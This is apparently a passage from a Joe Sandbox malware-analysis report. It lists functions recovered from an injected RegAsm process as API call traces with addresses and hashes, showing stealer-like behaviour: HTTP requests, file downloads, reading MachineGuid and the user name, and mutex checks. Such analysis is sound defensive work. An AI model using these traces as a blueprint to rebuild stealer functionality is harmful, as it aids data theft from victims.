                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004120CD
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 004120E4
                                                                                                                                                                                                  • Part of subcall function 0040FD58: LocalAlloc.KERNEL32(00000040,004120FA,00000001,00000000,?,004120F9,00000000,00000000), ref: 0040FD71
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,00000000), ref: 0041210B
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00412120
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0041213B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                • API String ID: 3807055897-1526165396
                                                                                                                                                                                                • Opcode ID: ac02564c219586449912e50da6d9ac6e3c745d53a9813d04f84db680ce203be5
                                                                                                                                                                                                • Instruction ID: 66083b9e844cd680733755929d09a5d117d1feb15589e886b9e09f68fc8bf6fd
                                                                                                                                                                                                • Opcode Fuzzy Hash: ac02564c219586449912e50da6d9ac6e3c745d53a9813d04f84db680ce203be5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4641B6B1800258AACB11FBB2C946FEE7BB4AF15304F50446FF501B3282DB785F18C669
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00404E01 Relevance: 15.1, APIs: 10, Instructions: 116networkfileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00404E06
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00403A76: _EH_prolog.MSVCRT ref: 00403A7B
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AAD
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB6
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABF
                                                                                                                                                                                                  • Part of subcall function 00403A76: lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403AD9
                                                                                                                                                                                                  • Part of subcall function 00403A76: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403AE9
                                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E55
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?), ref: 00404E6F
                                                                                                                                                                                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E93
                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404EB4
                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00404EDB
                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404EFF
                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00404F19
                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404F20
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00404F29
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2737972104-0
                                                                                                                                                                                                • Opcode ID: 789fadb869290a8cac76a952fa475ee3c379c0fd38a39066651882516cb048f3
                                                                                                                                                                                                • Instruction ID: c30001f37dfef2ba3a62dc7abc4d62383111a9d041917fc10e11156dbfb6defe
                                                                                                                                                                                                • Opcode Fuzzy Hash: 789fadb869290a8cac76a952fa475ee3c379c0fd38a39066651882516cb048f3
                                                                                                                                                                                                • Instruction Fuzzy Hash: B4412BB1900219AFDB10EBA1DC86EEF7BBDEB45304F10443AF611B2191E7385A45DBA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040DD88 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040DD8D
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040DDCE
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040DE43
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040DF5F
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 0040C481: _EH_prolog.MSVCRT ref: 0040C486
                                                                                                                                                                                                  • Part of subcall function 0040A9CD: _EH_prolog.MSVCRT ref: 0040A9D2
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000), ref: 0040E015
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000), ref: 0040E089
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy
                                                                                                                                                                                                • String ID: Stable\$ Stable\
                                                                                                                                                                                                • API String ID: 2120869262-4033978473
                                                                                                                                                                                                • Opcode ID: c1495879ff8cf3d8f166f597e6518a8f4bd9861bf53bb9e785a016e65547f3ef
                                                                                                                                                                                                • Instruction ID: 39234b0675f3014c4c9e49e3ec6ca5165c6a2cf47cf458f9d85aae2044e49338
                                                                                                                                                                                                • Opcode Fuzzy Hash: c1495879ff8cf3d8f166f597e6518a8f4bd9861bf53bb9e785a016e65547f3ef
                                                                                                                                                                                                • Instruction Fuzzy Hash: A1D19770D00249EADF00EBBAD946BDEBFB4AF15304F10446EE84577282DB785718CBA6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004061D7 Relevance: 10.6, APIs: 7, Instructions: 70filememoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406262
                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3869837436-0
                                                                                                                                                                                                • Opcode ID: 0bc206bb0d39ca1d6bd887a7afb13499fe0583c39eeede592551b7768891eff4
                                                                                                                                                                                                • Instruction ID: 9d9e751b5235763514e2182f58e510e1fdeb6aca53789148066bf4609c63ef2f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bc206bb0d39ca1d6bd887a7afb13499fe0583c39eeede592551b7768891eff4
                                                                                                                                                                                                • Instruction Fuzzy Hash: AA217970900204ABDB21EFA5CC48EAFBBB9FB85710F20056EF952F22D0D7388951CB64
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040F462 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42registryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040F488
                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,0042548E,?,?,00000000), ref: 0040F4A4
                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(0042548E,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0040F4C3
                                                                                                                                                                                                • CharToOemA.USER32(?,?), ref: 0040F4E0
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CharOpenQueryValuememset
                                                                                                                                                                                                • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                • API String ID: 1728412123-1211650757
                                                                                                                                                                                                • Opcode ID: 02d94da84b45a5bc20e3c930cd2c0627a20dac127c7278667ec9a0451b1acaad
                                                                                                                                                                                                • Instruction ID: 90300627fe78503570c6aac238b46943bd26772eb519af82a61773519d7520d2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 02d94da84b45a5bc20e3c930cd2c0627a20dac127c7278667ec9a0451b1acaad
                                                                                                                                                                                                • Instruction Fuzzy Hash: F301E17594421DFEEB50DB90DC85EEAB77CAB14744F1001E1A645A2051E6745E888F64
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040EF70 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000,?,Windows: ,00000000,?,0042555C,00000000,?,Work Dir: In memory,00000000,?,00425544), ref: 0040EF7E
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040EF85
                                                                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 0040EFA5
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040EFCB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                • String ID: %d MB$@
                                                                                                                                                                                                • API String ID: 3644086013-3474575989
                                                                                                                                                                                                • Opcode ID: fd0e751e240304ba7d829f0ca1267b82a4dd9d406921b7e0cc4cd899e75fcadd
                                                                                                                                                                                                • Instruction ID: d4ae09faefcb36e180699abcc9b5883cfb19ecae6e5fbbedd1348e0d70c088e6
                                                                                                                                                                                                • Opcode Fuzzy Hash: fd0e751e240304ba7d829f0ca1267b82a4dd9d406921b7e0cc4cd899e75fcadd
                                                                                                                                                                                                • Instruction Fuzzy Hash: 55F01DB5A40218ABEB009BA5DD4AF6E76AEE745705F404429F702E62C0EAB8D8058665
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00416219 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 004162F9: wcslen.MSVCRT ref: 004162FE
                                                                                                                                                                                                  • Part of subcall function 004162F9: wcslen.MSVCRT ref: 0041630A
                                                                                                                                                                                                  • Part of subcall function 004162F9: LoadLibraryA.KERNEL32(The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser,0041622B), ref: 00416316
                                                                                                                                                                                                  • Part of subcall function 004162F9: wcslen.MSVCRT ref: 00416326
                                                                                                                                                                                                  • Part of subcall function 004162F9: wcslen.MSVCRT ref: 00416332
                                                                                                                                                                                                  • Part of subcall function 004162F9: wcslen.MSVCRT ref: 0041634A
                                                                                                                                                                                                  • Part of subcall function 004162F9: wcslen.MSVCRT ref: 00416356
                                                                                                                                                                                                  • Part of subcall function 004162F9: wcslen.MSVCRT ref: 00416376
                                                                                                                                                                                                  • Part of subcall function 004162F9: wcslen.MSVCRT ref: 00416380
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 00416394
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 004163AB
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 004163C2
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 004163D9
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 004163F0
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 00416407
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 0041641E
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 00416435
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 0041644C
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 00416463
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 0041647A
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 00416491
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 004164A8
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 004164BF
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 004164D6
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 004164ED
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 00416504
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 0041651B
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EBBA: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041623D,00425507), ref: 0040EBC6
                                                                                                                                                                                                  • Part of subcall function 0040EBBA: HeapAlloc.KERNEL32(00000000,?,?,?,0041623D,00425507), ref: 0040EBCD
                                                                                                                                                                                                  • Part of subcall function 0040EBBA: GetUserNameA.ADVAPI32(00000000,?), ref: 0040EBE1
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041629E
                                                                                                                                                                                                • Sleep.KERNEL32(00001B58), ref: 004162A9
                                                                                                                                                                                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00425A60,?,00000000,00425507), ref: 004162BA
                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004162D0
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004162DE
                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 004162E5
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$wcslen$lstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologLibraryLoadNameOpenSleepUserlstrcatlstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2119032056-0
                                                                                                                                                                                                • Opcode ID: 07d8c05c405f0823ea941a26bfbe178101e3d604278b7344bc2b617775133b21
                                                                                                                                                                                                • Instruction ID: 3b746e891c5ee0c66c2a91cc43542382523336fa1075cbc9f29eedf77854c369
                                                                                                                                                                                                • Opcode Fuzzy Hash: 07d8c05c405f0823ea941a26bfbe178101e3d604278b7344bc2b617775133b21
                                                                                                                                                                                                • Instruction Fuzzy Hash: BB115C71900418AACB01FBA3DD5ACEE777EAE55304B40087EF502B20D2DF385A15CAA9
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00403A76 Relevance: 9.1, APIs: 6, Instructions: 56stringnetworkCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00403A7B
                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 00403AAD
                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 00403AB6
                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 00403ABF
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403AD9
                                                                                                                                                                                                • InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403AE9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
